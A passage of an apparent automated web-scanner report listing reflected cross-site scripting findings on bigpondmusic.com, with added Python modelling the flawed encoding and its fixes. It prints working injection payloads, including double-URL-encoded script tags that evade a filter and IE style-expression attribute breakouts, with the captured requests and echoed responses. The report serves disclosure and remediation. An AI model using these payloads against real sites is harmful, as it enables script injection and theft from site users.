This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
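The sink in 2.27 (and in 2.31 and 2.35, which report the same script block) is a single-quoted JavaScript string literal into which a path segment is concatenated. The following Python is an added example, not code from the BigPond Music application or from this report; the js_channel_* names and the sample values are constructed for illustration. It contrasts the concatenation the captured responses show with a serialiser that emits the value as a JSON string literal and additionally escapes the characters that matter inside an inline script block.

```python
import json

# Constructed values modelled on the report's marker and on a script-closing
# payload; neither is captured traffic.
JS_PAYLOAD = "album4a58b';1ecb978a1bf"
SCRIPT_CLOSER = "</script><script>alert(1)</script>"


def js_channel_vulnerable(value):
    """Model of the reported sink: the path segment is concatenated into a
    single-quoted JavaScript string literal with no encoding, so a quote in
    the value terminates the literal and the remainder is parsed as code."""
    return "s.channel = '" + value + "';"


def js_string_literal(value):
    """Serialise a Python string as a JavaScript string literal that cannot
    terminate the literal or the enclosing <script> block.

    json.dumps quotes the value, escapes '"' and '\\', and (with the default
    ensure_ascii=True) writes every non-ASCII character, including the JS
    line terminators U+2028/U+2029, as a \\uXXXX escape. The characters that
    json.dumps leaves alone but that matter in inline HTML script content
    ('<', '>', '&') are then rewritten as \\uXXXX escapes too, so the
    sequence '</script>' can never appear in the output."""
    literal = json.dumps(value, ensure_ascii=True)
    for ch in "<>&":
        literal = literal.replace(ch, "\\u%04x" % ord(ch))
    return literal


def js_channel_fixed(value):
    """Hardened sink: the value is emitted through js_string_literal."""
    return "s.channel = " + js_string_literal(value) + ";"


def decode_js_literal(literal):
    """A JSON parser understands the same \\uXXXX escapes as a JavaScript
    engine, so this recovers the original value and shows the encoding is
    lossless."""
    return json.loads(literal)
```

The fixed variant switches the literal to double quotes because that is what json.dumps produces; the single quote in the marker then stays inside the string as data. The same encoder applies to every s.prop* assignment in that script block, not only to s.channel.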

Request

GET /album4a58b'%3b1ecb978a1bf/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4a58b';1ecb978a1bf';
   s.prop4 = 'bon-jovi';
   s.prop5 = 'bon-jovi-greatest-hits-the-ultimate-collection';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1
...[SNIP]...

2.28. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885 was submitted in the REST URL parameter 1. This input was echoed as 30492"><script>alert(1)</script>85c7280a885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
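The findings above share one output point, the hidden parentUrl field: 2.25 shows a raw double quote in the h parameter closing the attribute, and 2.28 shows the same attribute reached from the path once the angle brackets are double URL-encoded. The following Python is an added model of that pipeline, not code from the BigPond Music application or from this report; the blocklist_filter, the "decode twice" step and the sample inputs are assumptions constructed to match the report's description. The fixed variant applies the remediation the report calls for (decode once, validate after canonicalisation) and adds HTML attribute encoding at the sink, which is what closes the h-parameter case as well.

```python
import html
from urllib.parse import unquote

# Constructed inputs modelled on the report's payloads, not captured traffic.
# PATH_PAYLOAD is double URL-encoded (%2522 -> %22 -> "); QUERY_PAYLOAD carries
# raw double quotes as the h parameter did.
PATH_PAYLOAD = "album30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885"
QUERY_PAYLOAD = 'b13a6"style="x:expression(alert(1))"ea60f3dc6d6'

ATTR_TEMPLATE = '<input type="hidden" name="parentUrl" value="{}" />'


def blocklist_filter(value):
    """Assumed character blocklist: rejects the angle brackets the scanner had
    to double-encode to get past. Returns True when the value is accepted."""
    return not any(ch in value for ch in "<>")


def render_parent_url_vulnerable(raw):
    """Model of the reported behaviour: the web server decodes once, the
    application validates that result, then decodes a second time and echoes
    the value into a double-quoted attribute without encoding it.
    Returns None when the filter rejects the request."""
    once = unquote(raw)            # web server's decode
    if not blocklist_filter(once):
        return None
    twice = unquote(once)          # application's redundant second decode
    return ATTR_TEMPLATE.format(twice)


def render_parent_url_fixed(raw):
    """Hardened version: a single decode, validation on the canonical value,
    and HTML attribute encoding (quotes included) at the output sink."""
    once = unquote(raw)
    if not blocklist_filter(once):
        return None
    return ATTR_TEMPLATE.format(html.escape(once, quote=True))


def attribute_breakout(rendered):
    """True when the rendered markup carries more double quotes than the
    template itself, i.e. the reflected value terminated the attribute."""
    if rendered is None:
        return False
    return rendered.count('"') > ATTR_TEMPLATE.count('"')
```

The single-encoded form of the path payload is rejected by the model's filter, which is why the scanner had to double-encode; the fixed variant never sees the decoded angle brackets at all, and the raw quotes of the h-parameter payload are turned into &quot; before they reach the attribute.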

Request

GET /album30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88040


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album30492"><script>alert(1)</script>85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection" />
...[SNIP]...

2.29. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1867"style%3d"x%3aexpression(alert(1))"928c28e0869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1867"style="x:expression(alert(1))"928c28e0869 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style%3d"x%3aexpression(alert(1))"928c28e0869=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 152745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bon Jovi - Bon Jovi Greatest
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style="x:expression(alert(1))"928c28e0869=1" />
...[SNIP]...

2.30. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c was submitted in the REST URL parameter 1. This input was echoed as fd217"><script>alert(1)</script>fd04fe20e3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c/bruno-mars/just-the-way-you-are HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88047


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfd217"><script>alert(1)</script>fd04fe20e3c/bruno-mars/just-the-way-you-are" />
...[SNIP]...

2.31. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d12f4'%3bae96ba96e95 was submitted in the REST URL parameter 1. This input was echoed as d12f4';ae96ba96e95 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumd12f4'%3bae96ba96e95/bruno-mars/just-the-way-you-are HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87936


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumd12f4';ae96ba96e95';
   s.prop4 = 'bruno-mars';
   s.prop5 = 'just-the-way-you-are';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s
...[SNIP]...

2.32. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 was submitted in the h parameter. This input was echoed as 4fcf3"style="x:expression(alert(1))"a271f02fb84 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 100921


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bruno Mars - Just The Way Yo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style="x:expression(alert(1))"a271f02fb84" />
...[SNIP]...

2.33. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b916"style="x:expression(alert(1))"908c6cd8987 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/bruno-mars/just-the-way-you-are?2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 100834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bruno Mars - Just The Way Yo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?2b916"style="x:expression(alert(1))"908c6cd8987=1" />
...[SNIP]...

2.34. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660 was submitted in the REST URL parameter 1. This input was echoed as 98124"><script>alert(1)</script>9a41ace4660 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660/cheryl-cole/promise-this2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88229


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album98124"><script>alert(1)</script>9a41ace4660/cheryl-cole/promise-this2" />
...[SNIP]...

2.35. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ea10'%3b746216d7018 was submitted in the REST URL parameter 1. This input was echoed as 8ea10';746216d7018 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album8ea10'%3b746216d7018/cheryl-cole/promise-this2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album8ea10';746216d7018';
   s.prop4 = 'cheryl-cole';
   s.prop5 = 'promise-this2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.36. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 was submitted in the h parameter. This input was echoed as 36267"style="x:expression(alert(1))"89a1f9e1cf8 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/cheryl-cole/promise-this2?h=76639449836267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111361


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Cheryl Cole - Promise This -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/cheryl-cole/promise-this2?h=76639449836267"style="x:expression(alert(1))"89a1f9e1cf8" />
...[SNIP]...

2.37. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9888f"style="x:expression(alert(1))"97f64925c9b in the application's response.

